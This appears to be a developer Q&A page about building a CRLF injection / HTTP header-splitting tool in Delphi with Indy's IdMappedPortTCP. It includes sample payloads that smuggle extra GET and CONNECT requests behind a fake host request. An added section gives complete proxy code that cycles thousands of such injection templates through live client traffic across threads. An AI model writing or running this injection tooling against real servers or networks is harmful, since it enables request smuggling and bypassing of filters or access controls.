Testing Somesite CRLF Bugs Hole Using Indy IdMappedPortTCP


I want to create a small tool for CRLF injection / HTTP response header splitting. I have successfully created lists of thousands of NetData patterns (data payloads). The NetData patterns look like these examples:

  1. GET http://somebug.com/ HTTP/1.1[CRLF]Host : somehost.com[CRLF]GET somesite.com HTTP/1.1[CRLF][CRLF]

  2. GET http://somebug.com/ HTTP/1.1[CRLF]Host : somehost.com[CRLF][CRLF]GET somesitesite.com HTTP/1.1[CRLF][CRLF]

  3. HEAD http://somebug.com/ HTTP/1.1[CRLF]Host : somehost.com[CRLF]CONNECT somesitesite.com HTTP/1.0[CRLF][CRLF][CRLF][CRLF]

    ...

If there is just one data pattern/payload, I can write example code like:

// OnExecute with one hard-coded payload: wrap any request containing CONNECT
procedure T_CRLFTest.IdMappedPortTCP1Execute(AContext: TIdContext);
var
  Ctx: TIdMappedPortContext;
begin
  Ctx := TIdMappedPortContext(AContext);
  if Pos('CONNECT', Ctx.NetData) <> 0 then
    Ctx.NetData := 'GET http://somebug.com/ HTTP/1.1'#13#10'Host : somehost.com'#13#10 +
      Ctx.NetData + #13#10#13#10;
end;

The problem is: how do I test all the data patterns, let's say a list of over 20,000, using IdMappedPortTCP with a multi-threaded technique?

I'm using Delphi 2007 and Indy 10.


There is 1 answer

2
Remy Lebeau

NetData contains whatever raw data was available on the socket at the moment the OnExecute event was fired. There is no guarantee about the content of NetData on any given triggering of the event. So every time the event is triggered, you need to store that data in your own per-connection buffer somewhere; then you can parse that buffer looking for complete lines, tweaking them as needed, and then update NetData with the new data as needed. Whatever data is in NetData when the event handler exits is the data that gets passed along to the target server.

BTW, HEAD http://somebug.com/ HTTP/1.1[CRLF]Host : somehost.com[CRLF]CONNECT somesitesite.com HTTP/1.0[CRLF][CRLF][CRLF][CRLF] is two HTTP commands overlapping each other. That should never happen in a real scenario. If it is, then the client that is sending those commands is faulty.
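The following is an added example, written for this page and not code from the question or from the answer above. It puts the per-connection buffering the answer describes into a TIdMappedPortTCP handler set, and also rotates through a payload list from Indy's per-connection threads, which is what the question is after. Assumptions (none of which are in the original): the payload file holds one template per line using the `[CRLF]` marker from the question plus a hypothetical `{NETDATA}` placeholder where the client's own request is spliced in; the `TConnState` and `TCRLFTest` class names are made up for the example; `NetData` is treated as `TIdBytes`, as current Indy 10 declares it (if your Indy build declares it as a string, drop the `BytesToString`/`ToBytes` conversions); and requests are framed at the blank line that ends the headers, which is enough for the header-only patterns shown but would need `Content-Length` handling for requests with bodies.

```delphi
// Added example, not part of the original question or answer.
unit uCRLFProxy;

interface

uses
  SysUtils, Classes, Windows, IdGlobal, IdContext, IdMappedPortTCP;

type
  // Lives in AContext.Data for the life of one client connection.
  TConnState = class
  public
    Pending: string;   // bytes received from the client and not yet forwarded
  end;

  TCRLFTest = class
  private
    FPayloads: TStringList;   // assumed format: one [CRLF]-encoded template per line
    FNext: Integer;           // shared cursor into FPayloads, advanced atomically
    function NextPayload: string;
    function BuildRequest(const ATemplate, AOriginal: string): string;
  public
    constructor Create(const APayloadFile: string);
    destructor Destroy; override;
    procedure IdMappedPortTCP1Connect(AContext: TIdContext);
    procedure IdMappedPortTCP1Execute(AContext: TIdContext);
    procedure IdMappedPortTCP1Disconnect(AContext: TIdContext);
  end;

implementation

constructor TCRLFTest.Create(const APayloadFile: string);
begin
  inherited Create;
  FPayloads := TStringList.Create;
  FPayloads.LoadFromFile(APayloadFile);
  if FPayloads.Count = 0 then
    raise Exception.Create('payload list is empty');
  FNext := -1;   // first InterlockedIncrement yields index 0
end;

destructor TCRLFTest.Destroy;
begin
  FPayloads.Free;
  inherited;
end;

// Each rewritten request takes the next template. InterlockedIncrement makes the
// shared cursor safe across Indy's per-connection threads; the list itself is
// only read after construction, so it needs no lock.
function TCRLFTest.NextPayload: string;
begin
  Result := FPayloads[InterlockedIncrement(FNext) mod FPayloads.Count];
end;

// Expand the [CRLF] markers from the payload list and splice the client's own
// request in where the template's hypothetical {NETDATA} placeholder sits.
function TCRLFTest.BuildRequest(const ATemplate, AOriginal: string): string;
begin
  Result := StringReplace(ATemplate, '[CRLF]', #13#10, [rfReplaceAll]);
  Result := StringReplace(Result, '{NETDATA}', AOriginal, [rfReplaceAll]);
end;

procedure TCRLFTest.IdMappedPortTCP1Connect(AContext: TIdContext);
begin
  AContext.Data := TConnState.Create;   // fresh buffer per connection
end;

procedure TCRLFTest.IdMappedPortTCP1Execute(AContext: TIdContext);
var
  Ctx: TIdMappedPortContext;
  State: TConnState;
  EndOfHeaders: Integer;
  Request, Outgoing: string;
begin
  Ctx := TIdMappedPortContext(AContext);
  State := TConnState(AContext.Data);

  // NetData is an arbitrary slice of the stream: append it and work on the buffer.
  State.Pending := State.Pending + BytesToString(Ctx.NetData);

  // Forward only complete requests (terminated by a blank line); keep the rest.
  Outgoing := '';
  repeat
    EndOfHeaders := Pos(#13#10#13#10, State.Pending);
    if EndOfHeaders = 0 then
      Break;
    Request := Copy(State.Pending, 1, EndOfHeaders + 3);
    Delete(State.Pending, 1, EndOfHeaders + 3);
    // Rewrite the requests of interest; everything else passes through unchanged.
    if Pos('CONNECT', Request) <> 0 then
      Request := BuildRequest(NextPayload, Request);
    Outgoing := Outgoing + Request;
  until False;

  // Whatever is in NetData on exit is what gets written to the target server;
  // an empty value forwards nothing while a request is still incomplete.
  Ctx.NetData := ToBytes(Outgoing);
end;

procedure TCRLFTest.IdMappedPortTCP1Disconnect(AContext: TIdContext);
begin
  AContext.Data.Free;   // freed here so it works regardless of Indy version
  AContext.Data := nil;
end;

end.
```

Assign the three methods to the component's OnConnect, OnExecute and OnDisconnect events (for example `IdMappedPortTCP1.OnExecute := Test.IdMappedPortTCP1Execute;`) before activating it. With 20,000 templates in the file, each CONNECT request the client sends consumes one template, so a client that opens many connections, or sends many requests down each one, walks the whole list without any extra threading on your side: Indy already runs each connection in its own thread.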